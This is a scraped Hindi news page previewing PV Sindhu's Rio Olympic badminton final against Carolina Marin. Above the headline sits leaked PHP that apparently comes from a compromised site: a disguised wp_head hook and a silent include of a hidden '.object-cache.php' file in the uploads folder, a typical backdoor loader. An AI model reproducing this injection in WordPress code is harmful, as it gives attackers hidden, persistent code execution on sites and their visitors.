add_action('wp_head', function(){echo '';}, 1); /* core-assets-loader */ @include_once('/home/sochindi/public_html/wp-content/uploads/.wp-cache-cd8672/.object-cache.php'); LIVE: थोड़ी देर में शुरू होगा सिंधू का खिताबी मैच, भारत की नजर ‘गोल्डेन टेन’ पर – SOCH INDIA
Menu

खेल
LIVE: थोड़ी देर में शुरू होगा सिंधू का खिताबी मैच, भारत की नजर ‘गोल्डेन टेन’ पर

nobanner

PV Sindhu to take on marine in badmintio final

रियो ओलंपिक के 14वें दिन भारत की नजर 8 साल बाद पहले गोल्ड पर होगी। पीवी सिंधू बैडमिंटन के एकल फाइनल में इतिहास रचने के इरादे से आज शाम कोर्ट पर उतरेंगी।
हैदराबाद की सिंधू का स्वर्ण पदक के लिए अब शीर्ष वरीयता प्राप्त स्पेन की कैरोलिना मैरिन से मुकाबला होगा। दोनों का यह पहला ओलंपिक है और दोनों पहली बार ओलंपिक फाइनल खेल रही हैं।सिंधू बैडमिंटन से पदक जीतते वाली देश की दूसरी खिलाड़ी हैं। इससे पहले 2012 के लंदन ओलंपिक में साइना नेहवाल ने महिला एकल वर्ग में कांस्य पदक जीता था।

सिंधू एथलेटिक्स और निशानेबाजी को छोड़कर ओलंपिक के किसी अन्य खेल के फाइनल में पहुंचने भारत की पहली एथलीट हैं। एथलेटिक्स और निशानेबाजी ऐसे खेल हैं जिसके फाइनल में 2 से ज्यादा एथलीट पहुंचते हैं।

भारत अगर आज स्वर्ण पदक जीत जाता है तो वह ओलंपिक खेलों में स्वर्ण पदकों की दहाई संख्या को टच कर लेगा। भारत ने अब तक 9 स्वर्ण जिसमें 8 हॉकी और एक निशानेबाजी से आया है।

बृहस्पतिवार को हुए सेमीफाइनल मुकाबले में सिंधू ने जापान की नोजुमी ओकूहारा को सीधे गेमों में 21-19, 21-10 से हराकर फाइनल में जगह बनाई थी।

×

दूसरी ओर, दो बार की विश्व चैंपियन स्पेन की कैरोलिना मैरीन ने लंदन ओलंपिक की चैंपियन ली ज्युरेई को 21-14, 21-16 से हराते हुए फाइनल में अपनी जगह पक्की की थी।

दोनों के बीच हुए अब तक हुए मुकाबलों के परिणाम को देखें तो कैरोलिना मैरिन का पलड़ा थोड़ा झुकता दिखता है। ये दोनों पहले भी अलग-अलग प्रतियोगिताओं में 7 बार आमने-सामने हो चुकी हैं। जिसमें चार बार मेरिन जीतीं हैं और तीन बार बाजी सिंधु के हाथ लगी।